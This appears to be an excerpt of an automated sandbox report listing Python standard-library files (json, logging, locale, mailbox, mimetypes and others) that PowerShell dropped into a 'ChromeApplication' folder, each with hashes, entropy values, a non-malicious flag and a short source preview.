                                                                                                                                                                                                  SHA-512:E21F1F5EF9821DC49A71552D8E3E42DB1D1817A9567C10AEA7764B3143630105570BCBF41A63AEE58B65ED7AC13C77AFC2A16CB46DC236F3529A95D755150D66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Implementation of JSONDecoder.."""..import re....from json import scanner..try:.. from _json import scanstring as c_scanstring..except ImportError:.. c_scanstring = None....__all__ = ['JSONDecoder', 'JSONDecodeError']....FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL....NaN = float('nan')..PosInf = float('inf')..NegInf = float('-inf')......class JSONDecodeError(ValueError):.. """Subclass of ValueError with the following additional properties:.... msg: The unformatted error message.. doc: The JSON document being parsed.. pos: The start index of doc where parsing failed.. lineno: The line corresponding to pos.. colno: The column corresponding to pos.... """.. # Note that this exception is used from _json.. def __init__(self, msg, doc, pos):.. lineno = doc.count('\n', 0, pos) + 1.. colno = pos - doc.rfind('\n', 0, pos).. errmsg = '%s: line %d column %d (char %d)' % (msg, lineno, colno, pos).. ValueError.__init__(self, errmsg).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\json\encoder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16516
                                                                                                                                                                                                  Entropy (8bit):4.336988789550011
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:z8MkYik8K5R700myuumc/Wif3vwPQj+xSgy3vYJ54Ivj+xSvxCJ2sa:AY55R7JmyuumKf/pj+xSgy/8Nj+xSvQU
                                                                                                                                                                                                  MD5:8385055D886BDB6D7BDE9306262D5771
                                                                                                                                                                                                  SHA1:B468DB61686FCCD89829A048979922789E6C223F
                                                                                                                                                                                                  SHA-256:E6F0DFDAA65847A24ED293EBC00D273A06862EE36C889C234D5AB3435D4BA364
                                                                                                                                                                                                  SHA-512:6184DA762A0A43ECDDF5DEE142AEE374F86B2247C964FD5DF519CB6C82C398B5227315493DF134B14AF82EDC61ECE98FFC0D90CBCDC36278ED953AF4F04B6DBD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Implementation of JSONEncoder.."""..import re....try:.. from _json import encode_basestring_ascii as c_encode_basestring_ascii..except ImportError:.. c_encode_basestring_ascii = None..try:.. from _json import encode_basestring as c_encode_basestring..except ImportError:.. c_encode_basestring = None..try:.. from _json import make_encoder as c_make_encoder..except ImportError:.. c_make_encoder = None....ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')..ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')..HAS_UTF8 = re.compile(b'[\x80-\xff]')..ESCAPE_DCT = {.. '\\': '\\\\',.. '"': '\\"',.. '\b': '\\b',.. '\f': '\\f',.. '\n': '\\n',.. '\r': '\\r',.. '\t': '\\t',..}..for i in range(0x20):.. ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i)).. #ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))....INFINITY = float('inf')....def py_encode_basestring(s):.. """Return a JSON representation of a Python string.... """.. def replace(match):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\json\scanner.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2498
                                                                                                                                                                                                  Entropy (8bit):4.554490171873137
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:krFYUtdVRojq1j1op2sy5zRwDvAvsCYSl2SOsyV9P:krFJGjcjepJy5zRvkCYSl2SOsyV9P
                                                                                                                                                                                                  MD5:83EDC258CA5D89378BC86FE790CBF1B7
                                                                                                                                                                                                  SHA1:618A95730FC4AD64ADA9BA39F155B6A873D0447F
                                                                                                                                                                                                  SHA-256:9841566FB17315EBDD40A1CA9CB214F02CDE7171B187D4DC821C80120EA853C3
                                                                                                                                                                                                  SHA-512:932029300DB3D377BAA4B8003ACB2B76D7F757C02F067B035F4A248A8D2C1FF8E34CB7BBC4E332D354A3ACEF01A4905349F291F7E66774D1F557BA6126A0A225
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""JSON token scanner.."""..import re..try:.. from _json import make_scanner as c_make_scanner..except ImportError:.. c_make_scanner = None....__all__ = ['make_scanner']....NUMBER_RE = re.compile(.. r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',.. (re.VERBOSE | re.MULTILINE | re.DOTALL))....def py_make_scanner(context):.. parse_object = context.parse_object.. parse_array = context.parse_array.. parse_string = context.parse_string.. match_number = NUMBER_RE.match.. strict = context.strict.. parse_float = context.parse_float.. parse_int = context.parse_int.. parse_constant = context.parse_constant.. object_hook = context.object_hook.. object_pairs_hook = context.object_pairs_hook.. memo = context.memo.... def _scan_once(string, idx):.. try:.. nextchar = string[idx].. except IndexError:.. raise StopIteration(idx) from None.... if nextchar == '"':.. return parse_string(string, idx + 1, stri

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\json\tool.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3424
                                                                                                                                                                                                  Entropy (8bit):4.383060644777333
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:pPza+AFS0/LZ3DmLU9k+3W7P/BopadkHqdyf6yAp7zKaz:pP8Fp/F3EU9kV8adkHBf2Is
                                                                                                                                                                                                  MD5:04BB41005A34A0439354779391919F36
                                                                                                                                                                                                  SHA1:3878CE551869C7CD7A9801CC7E1533D758D73F7D
                                                                                                                                                                                                  SHA-256:E4940A58DC30B05A4D66ABCE80C8FF52712BD9EAAAAF50B526ECCB49185950D6
                                                                                                                                                                                                  SHA-512:E5ACA0CE7E46F86F678464E2C1AEEDD2B3BC86C98323B362FF02235DC69295001E0B6F7978754A0917AA4640808CB2656FFC64CCA179E88378AE85F2A0E34CD6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""Command-line tool to validate and pretty-print JSON....Usage::.... $ echo '{"json":"obj"}' | python -m json.tool.. {.. "json": "obj".. }.. $ echo '{ 1.2:3.4}' | python -m json.tool.. Expecting property name enclosed in double quotes: line 1 column 3 (char 2)...."""..import argparse..import json..import sys..from pathlib import Path......def main():.. prog = 'python -m json.tool'.. description = ('A simple command line interface for json module '.. 'to validate and pretty-print JSON objects.').. parser = argparse.ArgumentParser(prog=prog, description=description).. parser.add_argument('infile', nargs='?',.. type=argparse.FileType(encoding="utf-8"),.. help='a JSON file to be validated or pretty-printed',.. default=sys.stdin).. parser.add_argument('outfile', nargs='?',.. type=Path,.. help='write the output of infile t

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\keyword.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1124
                                                                                                                                                                                                  Entropy (8bit):4.587431451247715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1TuAvF8VVC7Ln46q7a/cl6b93h0qkc7mKeWdItSw+9S7e5:1K88VVV8c0qqp7mKr
                                                                                                                                                                                                  MD5:DC5106AABD333F8073FFBF67D63F1DEE
                                                                                                                                                                                                  SHA1:E203519CCD77F8283E1EA9D069C6E8DE110E31D9
                                                                                                                                                                                                  SHA-256:EBD724ED7E01CE97ECB3A6B296001FA4395BB48161658468855B43CFF0E6EEBB
                                                                                                                                                                                                  SHA-512:A2817944D4D2FB9EDD2E577FB0D6B93337E1B3F98D31AD157557363146751C4B23174D69C35EE5D292845DEDCD5EF32EEAC52B877D96EB108C819415D5CF300E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Keywords (from "Grammar/python.gram")....This file is automatically generated; please don't muck it up!....To update the symbols in this file, 'cd' to the top directory of..the python source tree and run:.... PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen \.. Grammar/python.gram \.. Grammar/Tokens \.. Lib/keyword.py....Alternatively, you can run 'make regen-keyword'..."""....__all__ = ["iskeyword", "issoftkeyword", "kwlist", "softkwlist"]....kwlist = [.. 'False',.. 'None',.. 'True',.. 'and',.. 'as',.. 'assert',.. 'async',.. 'await',.. 'break',.. 'class',.. 'continue',.. 'def',.. 'del',.. 'elif',.. 'else',.. 'except',.. 'finally',.. 'for',.. 'from',.. 'global',.. 'if',.. 'import',.. 'in',.. 'is',.. 'lambda',.. 'nonlocal',.. 'not',.. 'or',.. 'pass',.. 'raise',.. 'return',.. 'try',.. 'while',.. 'with',.. 'yield'..]....softkwlist = [.. '_',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\linecache.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5872
                                                                                                                                                                                                  Entropy (8bit):4.318351105582314
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:459KnwPrY0wNyGv0/lTqhlBI2hgOwTYjbnknCG/l2IhLySDQ/v5R4/yi:Q9KnBg9qh5wTinknCG/1VySDQ/v8/yi
                                                                                                                                                                                                  MD5:E54F85B0CA944E38241E4E7322026758
                                                                                                                                                                                                  SHA1:55F288E471BB0E2B426F69AAC6F22BCB7A71DADE
                                                                                                                                                                                                  SHA-256:9ED3BA77F235C8FCC60D00BD6B9AA9495C717B59C8AC9EFB7C6FFDFE9B82B034
                                                                                                                                                                                                  SHA-512:54E47DD813DFEBC5147296E32A445F3A10FB89C48140EB9F5276B7CE564F74DC3955722C340DDA26541495A5B8C658ED70BF74090AAD505654EBFCCFA1246E1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Cache lines from Python source files.....This is intended to read lines from modules imported -- hence if a filename..is not found, it will look down the module search path for a file by..that name..."""....import functools..import sys..import os..import tokenize....__all__ = ["getline", "clearcache", "checkcache", "lazycache"]......# The cache. Maps filenames to either a thunk which will provide source code,..# or a tuple (size, mtime, lines, fullname) once loaded...cache = {}......def clearcache():.. """Clear the cache entirely.""".. cache.clear()......def getline(filename, lineno, module_globals=None):.. """Get a line for a Python source file from the cache... Update the cache if it doesn't contain an entry for this file already.""".... lines = getlines(filename, module_globals).. if 1 <= lineno <= len(lines):.. return lines[lineno - 1].. return ''......def getlines(filename, module_globals=None):.. """Get the lines for a Python source file from the

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\locale.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF, CR line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):79885
                                                                                                                                                                                                  Entropy (8bit):4.366884409318954
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:KPRttodRiVJ8forhoJiVz3Pu8h+H6IVy7tWYsvqkYV+dOPzwlorNpdADdNZn8VF6:KPRtX9oiukigJsOYZFhr9pUT9FW
                                                                                                                                                                                                  MD5:374B0F166F2FC787BC59D71555F62378
                                                                                                                                                                                                  SHA1:6DE0DFD89E9F8AAA4E76B3BFED821B3C9C444584
                                                                                                                                                                                                  SHA-256:91C791F7C41C23A8C64026A92AB276DE5D3F2F0661430D44596054F40CFFC66B
                                                                                                                                                                                                  SHA-512:466A74BEC12122E90708B6118B948D9DC1E33187212E6065FC81AFB004704F68DB03B5EFF2A2294179507D36A7ECDA6B41BDA4EAF9BF07E1B0B29A7A9842FD31
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Locale support module.....The module provides low-level access to the C lib's locale APIs and adds high..level number formatting APIs as well as a locale aliasing engine to complement..these.....The aliasing engine includes support for many commonly used locale names and..maps them to values suitable for passing to the C lib's setlocale() function. It..also includes default encodings for all supported locale names....."""....import sys..import encodings..import encodings.aliases..import re..import _collections_abc..from builtins import str as _builtin_str..import functools....# Try importing the _locale module...#..# If this fails, fall back on a basic 'C' locale emulation.....# Yuck: LC_MESSAGES is non-standard: can't tell whether it exists before..# trying the import. So __all__ is also fiddled at the end of the file...__all__ = ["getlocale", "getdefaultlocale", "getpreferredencoding", "Error",.. "setlocale", "resetlocale", "localeconv", "strcoll", "strxfrm",..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\logging\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):82493
                                                                                                                                                                                                  Entropy (8bit):4.535333444845991
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TTM4A0scEBFwpxWJvH1LHaCAUSxV37kbGQR6+KVQhb:TTM4V/oNH17aykVLM0qJ
                                                                                                                                                                                                  MD5:B8A10CBEDFF425920DC05A5038BA5723
                                                                                                                                                                                                  SHA1:D7963C9958397B1AE8377AB8D17A8652CDDE5702
                                                                                                                                                                                                  SHA-256:613C94FD78D5C40972F0E6A829C1BAAAA7496B3DE641200FC84970F89DAAA494
                                                                                                                                                                                                  SHA-512:CBE3646C50B69A9359BE431BB583E201F02CD850AA7EFFD3AAE1FB190907DBAC63BC43F56805F1D95A90914BAF8828FADEEA4B439860C624514FCAF1AC96B4D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\logging\config.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37442
                                                                                                                                                                                                  Entropy (8bit):4.3193858074775155
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TTOLQcVmMtVTFx4mDAlisUCH7vZM242+xuGYV:TTOLpxtVz4mDAlisUCH7u242+A3V
                                                                                                                                                                                                  MD5:D404523DA4E85E6C5D23BA7F4CEC734F
                                                                                                                                                                                                  SHA1:EA99F93A2C9A4490FF834675455DDC9A3B1A8644
                                                                                                                                                                                                  SHA-256:CD1E433C7D3C56ABFA6197A3375F2AD435C030D2576437D6331EABA2256C5C86
                                                                                                                                                                                                  SHA-512:78DEF3DF3ADC8435981BC4A2CD2D44441DE5FC62D566DD774EC48D94A04347E70227B1857CD27D0857B903776A241EB43BD218588D54267A23CC9BB01147F33D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\logging\handlers.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):63003
                                                                                                                                                                                                  Entropy (8bit):4.426667243960486
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:yTAqnmKu/EaGYhxVRkXAHq94TB+nbGsbDDL2eLRBoljlZ:yTF7uS4xHkp1nbGsbDDL2cRBolH
                                                                                                                                                                                                  MD5:2B773B05650F410892A2CE9FE7516285
                                                                                                                                                                                                  SHA1:F739153F9C119A7671414CCFBEE9B761256563BC
                                                                                                                                                                                                  SHA-256:B70B1BE031F587D55D836E1E49995CA266487FE27F52B3F6FD4F9D7A8DEB48DD
                                                                                                                                                                                                  SHA-512:12608454D0CAA866D7DAFBFCFEFF11A07AACF103C4D0326A51F90C0157BB9E17B3AC2BA4F55590C3EF6249C367326A8A386021EF178A079D34F57591C58DF6CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright 2001-2021 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\lzma.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):4.6079115173576595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:1aniQNwG7fMpo6Yx6ip/qkFQ1bN54ga15DPi7kMP4:Ki2N62QN+xMw
                                                                                                                                                                                                  MD5:FACB9DDF63AA1A9A7BDA31E8B5D5D227
                                                                                                                                                                                                  SHA1:26387A733267073DE41848DAF103582DBCED3AB6
                                                                                                                                                                                                  SHA-256:DA46FA7C6C554A0705CF9A7318279B56FD5F62F71A55AC28E9579616F11129D6
                                                                                                                                                                                                  SHA-512:E26E99D48775E2C3135DEF115F0B05550E5FEF1C0B9FD6178799E339A9F92F3FA05262E81C160B822F4D676763213D5252BC365F76571947F7AF386C1E0CB90D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Interface to the liblzma compression library.....This module provides a class for reading and writing compressed files,..classes for incremental (de)compression, and convenience functions for..one-shot (de)compression.....These classes and functions support both the XZ and legacy LZMA..container formats, as well as raw compressed data streams..."""....__all__ = [.. "CHECK_NONE", "CHECK_CRC32", "CHECK_CRC64", "CHECK_SHA256",.. "CHECK_ID_MAX", "CHECK_UNKNOWN",.. "FILTER_LZMA1", "FILTER_LZMA2", "FILTER_DELTA", "FILTER_X86", "FILTER_IA64",.. "FILTER_ARM", "FILTER_ARMTHUMB", "FILTER_POWERPC", "FILTER_SPARC",.. "FORMAT_AUTO", "FORMAT_XZ", "FORMAT_ALONE", "FORMAT_RAW",.. "MF_HC3", "MF_HC4", "MF_BT2", "MF_BT3", "MF_BT4",.. "MODE_FAST", "MODE_NORMAL", "PRESET_DEFAULT", "PRESET_EXTREME",.... "LZMACompressor", "LZMADecompressor", "LZMAFile", "LZMAError",.. "open", "compress", "decompress", "is_check_supported",..]....import builtins..import io..import os..from _lzma

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\mailbox.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80945
                                                                                                                                                                                                  Entropy (8bit):4.32888996076859
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:inRVh+YxnKyQE4XXH7R7roIfNJMVNMTGDSSoQvV/RzqDSsz/WJ:gRnlxnKyQEAbxrvJMVNMTSrdJz7sz/WJ
                                                                                                                                                                                                  MD5:6F58186862F4DD316370EB2426974AD8
                                                                                                                                                                                                  SHA1:1271E30BB63D4B3C7D79619A0E00C8740B76C1AF
                                                                                                                                                                                                  SHA-256:1D5A2E2D2AA10962128083F200C3188B57543F80B6D9FADA3E0DB2BD3B4A8265
                                                                                                                                                                                                  SHA-512:7E1B520ED42DCEC7ACC50E8FE5E975F3E2FEF3D05172A680CA1CF1ADC1AF988F414635C66CFCE5ADEDA395F442A7E9EDC7EA0B27021943FE45788797468926CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Read/write support for Maildir, mbox, MH, Babyl, and MMDF mailboxes."""....# Notes for authors of new mailbox subclasses:..#..# Remember to fsync() changes to disk before closing a modified file..# or returning from a flush() method. See functions _sync_flush() and..# _sync_close().....import os..import time..import calendar..import socket..import errno..import copy..import warnings..import email..import email.message..import email.generator..import io..import contextlib..from types import GenericAlias..try:.. import fcntl..except ImportError:.. fcntl = None....__all__ = ['Mailbox', 'Maildir', 'mbox', 'MH', 'Babyl', 'MMDF',.. 'Message', 'MaildirMessage', 'mboxMessage', 'MHMessage',.. 'BabylMessage', 'MMDFMessage', 'Error', 'NoSuchMailboxError',.. 'NotEmptyError', 'ExternalClashError', 'FormatError']....linesep = os.linesep.encode('ascii')....class Mailbox:.. """A group of messages in a particular place.""".... def __init__(self, path, facto

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\mailcap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9414
                                                                                                                                                                                                  Entropy (8bit):4.388993591955687
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Qld55VGNyMNKjLmlUk0qwNfpyBO6WBL2gbL9lWj+R/IDHMZYtfH6CzgEYLARQz:QldD7NflLd+j+RgDQA/6CsEYLARk
                                                                                                                                                                                                  MD5:5AA1FF0721FBA0760844039BB6B611B0
                                                                                                                                                                                                  SHA1:58A18A636D5B05BAAAAB72395B18ACF0800D8722
                                                                                                                                                                                                  SHA-256:E6E4C40533E07A294F7086F899005E03928EDE44CA5F9E532E47413147162E72
                                                                                                                                                                                                  SHA-512:204E569BE5A222B37A513F1C6430DEE0598486B3339CDDCA32BD72499564E58796CD9E4666E5509E4AD52FE4404F64601549F9AECD297004B1FFAD41D17EE3FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Mailcap file handling. See RFC 1524."""....import os..import warnings..import re....__all__ = ["getcaps","findmatch"]......def lineno_sort_key(entry):.. # Sort in ascending order, with unspecified entries at the end.. if 'lineno' in entry:.. return 0, entry['lineno'].. else:.. return 1, 0...._find_unsafe = re.compile(r'[^\xa1-\U0010FFFF\w@+=:,./-]').search....class UnsafeMailcapInput(Warning):.. """Warning raised when refusing unsafe input"""......# Part 1: top-level interface.....def getcaps():.. """Return a dictionary containing the mailcap database..... The dictionary maps a MIME type (in all lowercase, e.g. 'text/plain').. to a list of dictionaries corresponding to mailcap entries. The list.. collects all the entries for that MIME type from all available mailcap.. files. Each dictionary contains key-value pairs for that MIME type,.. where the viewing command is stored with the key "view"..... """.. caps = {}.. lineno = 0..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\mimetypes.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23180
                                                                                                                                                                                                  Entropy (8bit):4.463605733550332
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:NdY3Vj3p7PEvA4bNqC+3c0t18PctlG8yklR5clRVSalR5lR1PIHmTnmMd0xVI/WH:Nid3pUA4jI1Q8yI2Vd5pIB74WEQVMe9b
                                                                                                                                                                                                  MD5:19FD48570E012C57FDB02C096AF8FD97
                                                                                                                                                                                                  SHA1:E5DCF9298B01E38FAF310FE4FBAFD9AB66E78B4A
                                                                                                                                                                                                  SHA-256:FF9E8DDA5C86DF9278D9054689EC16221009420C1282EE3DB5268621F1F61184
                                                                                                                                                                                                  SHA-512:527767F7DA3A22FE01F1B25AB26FE269BA9213C643EFBCD0E1B94FB3A710BE7D2B578171D23DB18CD69F9183A4BCF2235A0B9AF64FE92EC1495D04954EEE8F0A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Guess the MIME type of a file.....This module defines two useful functions:....guess_type(url, strict=True) -- guess the MIME type and encoding of a URL.....guess_extension(type, strict=True) -- guess the extension for a given MIME type.....It also contains the following, for tuning the behavior:....Data:....knownfiles -- list of files to parse..inited -- flag set when init() has been called..suffix_map -- dictionary mapping suffixes to suffixes..encodings_map -- dictionary mapping suffixes to encodings..types_map -- dictionary mapping suffixes to types....Functions:....init([files]) -- parse a list of files, default knownfiles (on Windows, the.. default values are taken from the registry)..read_mime_types(file) -- parse one file, return a dictionary or None.."""....import os..import sys..import posixpath..import urllib.parse....try:.. from _winapi import _mimetypes_read_windows_registry..except ImportError:.. _mimetypes_read_windows_registry = None....try:.. import winreg

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\modulefinder.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25086
                                                                                                                                                                                                  Entropy (8bit):4.356741564526823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:KXf/9NmEvuo6xaWHV2EuKPZ5QdTl+pdEupOsP02pgbK+6WP6dY9n/CLP:UvcPaWHV21KeTl+pd1pOsM2SGgP6dY9c
                                                                                                                                                                                                  MD5:D696D103E7E451FFED860940CD1B06EA
                                                                                                                                                                                                  SHA1:DC0C9ABE84D6C0E952025F7F399BAF7F5461D99C
                                                                                                                                                                                                  SHA-256:92C6A7B834F56549F389C9C9924C29CDF6B2BDA10B43629B0F288C6F1B55C008
                                                                                                                                                                                                  SHA-512:E50232665631652810DA4187427B25E111E12C3216D1A9646F50E4EBCF1613748E6A24F5501204FBDC4BA00DF1EF0EE4D0E2E951C26CC1CB37784E802C437BEC
                                                                                                                                                                                                  Malicious:false
